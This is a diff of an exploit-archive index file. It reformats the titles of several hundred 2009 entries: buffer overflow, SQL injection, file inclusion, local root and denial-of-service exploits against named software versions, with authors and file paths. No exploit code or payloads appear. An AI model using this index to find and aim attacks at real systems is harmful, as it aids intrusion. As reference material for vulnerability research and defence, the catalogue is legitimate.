ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 9484,platforms/php/webapps/9484.txt,"PHP Dir Submit (aid) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 @@ -8960,9 +8960,9 @@ id,file,description,date,author,platform,type,port 9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 -9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 +9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities",2009-08-24,"Jean Trolleur",hardware,remote,0 -9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 +9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow Exploit",2009-08-24,SimO-s0fT,windows,remote,0 9501,platforms/windows/local/9501.py,"Audacity <= 1.2 - (.gro) Universal BoF Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 @@ -8971,14 +8971,14 @@ id,file,description,date,author,platform,type,port 9505,platforms/php/webapps/9505.txt,"Geeklog <= 1.6.0sr1 - Remote Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - (.fft) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - (.afp) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 -9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (Metasploit)",2009-08-25,His0k4,windows,remote,0 +9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow Exploit (Metasploit)",2009-08-25,His0k4,windows,remote,0 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-25,hack4love,windows,local,0 -9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection",2009-08-25,v3n0m,php,webapps,0 +9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 - (sid) SQL Injection",2009-08-25,v3n0m,php,webapps,0 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - (id) Remote SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0 9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept",2009-08-25,"Jon Oberheide",linux,local,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0 -9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 +9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow DoS Exploit (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS",2009-08-25,"Francis Provencher",windows,dos,0 9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 @@ -8986,27 +8986,27 @@ id,file,description,date,author,platform,type,port 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0 -9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (bSQL/LFI) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 -9525,platforms/php/webapps/9525.txt,"Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 +9525,platforms/php/webapps/9525.txt,"Moa Gallery <= 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS FrameWork <= 1.0 - (page) Remote SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service Exploit",2009-08-26,"ThE g0bL!N",windows,dos,0 -9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 +9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star <= 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 9530,platforms/php/webapps/9530.txt,"open auto classifieds <= 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 -9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 -9532,platforms/php/webapps/9532.txt,"allomani 2007 (cat) Remote SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 -9533,platforms/php/webapps/9533.txt,"phpSANE 0.5.0 (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 -9534,platforms/php/webapps/9534.txt,"Joomla Component com_digifolio 1.52 (id) SQL Injection",2009-08-27,v3n0m,php,webapps,0 +9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) Remote SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 +9533,platforms/php/webapps/9533.txt,"phpSANE 0.5.0 - (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 +9534,platforms/php/webapps/9534.txt,"Joomla Component com_digifolio 1.52 - (id) SQL Injection",2009-08-27,v3n0m,php,webapps,0 9535,platforms/php/webapps/9535.txt,"Uiga Church Portal (year) Remote SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 9536,platforms/windows/local/9536.py,"PIPL <= 2.5.0 - (.m3u) Universal Buffer Overflow Exploit (SEH)",2009-08-28,mr_me,windows,local,0 9537,platforms/windows/dos/9537.htm,"Kaspersky 2010 - Remote Memory Corruption / DoS PoC",2009-08-28,"Prakhar Prasad",windows,dos,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System (category.php) SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 -9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0 +9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0 9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 -9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 +9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 @@ -9016,29 +9016,29 @@ id,file,description,date,author,platform,type,port 9551,platforms/windows/local/9551.py,"Media Jukebox 8 - (.pls) Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities",2009-08-31,Affix,php,webapps,0 -9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 +9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0 -9563,platforms/php/webapps/9563.txt,"Joomla Component com_artportal 1.0 (portalid) SQL Injection Vulnerabilities",2009-09-01,"599eme Man",php,webapps,0 +9563,platforms/php/webapps/9563.txt,"Joomla Component com_artportal 1.0 - (portalid) SQL Injection Vulnerabilities",2009-09-01,"599eme Man",php,webapps,0 9564,platforms/php/webapps/9564.txt,"Joomla Component Agora 3.0.0b (com_agora) LFI",2009-09-01,ByALBAYX,php,webapps,0 -9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 -9566,platforms/php/webapps/9566.txt,"Kingcms 0.6.0 (menu.php) Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 +9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 - (bSQL/XSS) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 +9566,platforms/php/webapps/9566.txt,"Kingcms 0.6.0 - (menu.php) Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - (.plt) Universal Buffer Overflow Exploit (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 9569,platforms/php/webapps/9569.txt,"phpBB3 addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 -9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 -9571,platforms/php/webapps/9571.txt,"Joomla Component com_gameserver 1.0 (id) SQL Injection",2009-09-01,v3n0m,php,webapps,0 +9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - (debug_php.php) Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 +9571,platforms/php/webapps/9571.txt,"Joomla Component com_gameserver 1.0 - (id) SQL Injection",2009-09-01,v3n0m,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 -9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0 +9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2)",2009-09-02,spender,linux,local,0 9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3)",2009-09-02,Andi,linux,local,0 -9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 -9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 -9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection",2009-09-02,v3n0m,php,webapps,0 +9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 - (id) SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 +9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 +9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) Remote SQL Injection",2009-09-02,v3n0m,php,webapps,0 9579,platforms/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit",2009-09-03,kralor,windows,local,0 9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - (.m3u) Universal Local BoF Exploit (SEH)",2009-09-03,PLATEN,windows,local,0 @@ -9055,7 +9055,7 @@ id,file,description,date,author,platform,type,port 9592,platforms/windows/remote/9592.rb,"SIDVault 2.0e Windows Remote Buffer Overflow Exploit (Metasploit)",2009-09-04,His0k4,windows,remote,389 9593,platforms/php/webapps/9593.txt,"Joomla Compenent com_joomlub (aid) SQL Injection",2009-09-04,"599eme Man",php,webapps,0 9594,platforms/windows/dos/9594.txt,"Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD",2009-09-09,"laurent gaffie",windows,dos,0 -9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 +9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 - (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 @@ -9066,13 +9066,13 @@ id,file,description,date,author,platform,type,port 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla Component com_joomloc (id) SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS <= 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 -9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 (Win32) JavaScript (eval) Remote DoS Exploit",2009-09-09,"Jeremy Brown",windows,dos,0 +9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 - (Win32) JavaScript (eval) Remote DoS Exploit",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 -9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 (stoned) Local Buffer Overflow Exploit",2009-09-09,"Jeremy Brown",linux,local,0 +9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow Exploit",2009-09-09,"Jeremy Brown",linux,local,0 9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar Remote SQL Injection",2009-09-09,M3NW5,php,webapps,0 9610,platforms/windows/local/9610.py,"Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 -9611,platforms/php/webapps/9611.txt,"phpNagios 1.2.0 (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 -9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 +9611,platforms/php/webapps/9611.txt,"phpNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 +9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulnerabilities",2009-09-09,"Core Security",windows,dos,0 @@ -9080,9 +9080,9 @@ id,file,description,date,author,platform,type,port 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 -9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0 +9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple RFI Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0 -9624,platforms/windows/local/9624.py,"KSP 2009R2 (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0 +9624,platforms/windows/local/9624.py,"KSP 2009R2 - (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (LFI/fd/SQL/XSS) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro <= 6.0.0 - (.MID) Integer Overflow PoC",2009-09-10,Dr_IDE,windows,dos,0 9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0 @@ -9097,8 +9097,8 @@ id,file,description,date,author,platform,type,port 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 -9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 -9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 +9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 +9640,platforms/php/webapps/9640.txt,"gyro 5.0 - (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 @@ -9111,11 +9111,11 @@ id,file,description,date,author,platform,type,port 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 -9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 +9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla Component AlphaUserPoints SQL Injection Exploit",2009-09-14,jdc,php,webapps,0 9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - (.ibkey) Local Buffer Overflow Exploit",2009-09-14,PLATEN,windows,local,0 -9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 -9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit",2009-09-14,"Pankaj Kohli",windows,dos,0 +9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 +9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String DoS Exploit",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN Persistent XSS",2009-09-14,"599eme Man",hardware,remote,0 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 @@ -9127,49 +9127,49 @@ id,file,description,date,author,platform,type,port 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone (using tel:) Remote Crash Exploit",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service Exploit",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - (.jpg) Local Crash PoC",2009-09-14,the_Edit0r,windows,dos,0 -9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 (page) Remote SQL Injection",2009-09-14,Bgh7,php,webapps,0 +9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) Remote SQL Injection",2009-09-14,Bgh7,php,webapps,0 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - (.XML) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0 9671,platforms/windows/dos/9671.py,"Tuniac 090517c - (.pls) Local Crash PoC",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BoF Exploit (SEH) (0Day)",2009-09-15,blake,windows,remote,6660 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - (details.asp PropId) Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 -9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 +9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - (.m3u) Buffer Overflow PoC",2009-09-15,"fl0 fl0w",windows,dos,0 9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 - Local Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 -9681,platforms/php/webapps/9681.txt,"efront <= 3.5.4 (database.php path) Remote File Inclusion",2009-09-15,"cr4wl3r ",php,webapps,0 +9681,platforms/php/webapps/9681.txt,"efront <= 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,"cr4wl3r ",php,webapps,0 9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 - ActiveX Buffer Overflow PoC",2009-09-15,"Francis Provencher",windows,dos,0 9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service PoC",2009-09-15,"Francis Provencher",windows,dos,0 9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 -9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 (CreateStore) ActiveX Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 -9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 (CUE) Local Buffer Overflow PoC",2009-09-15,Dr_IDE,windows,dos,0 +9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 +9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow PoC",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0 9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (ping option) Command Injection (Auth)",2009-09-15,r00t,hardware,local,0 -9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0 +9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0 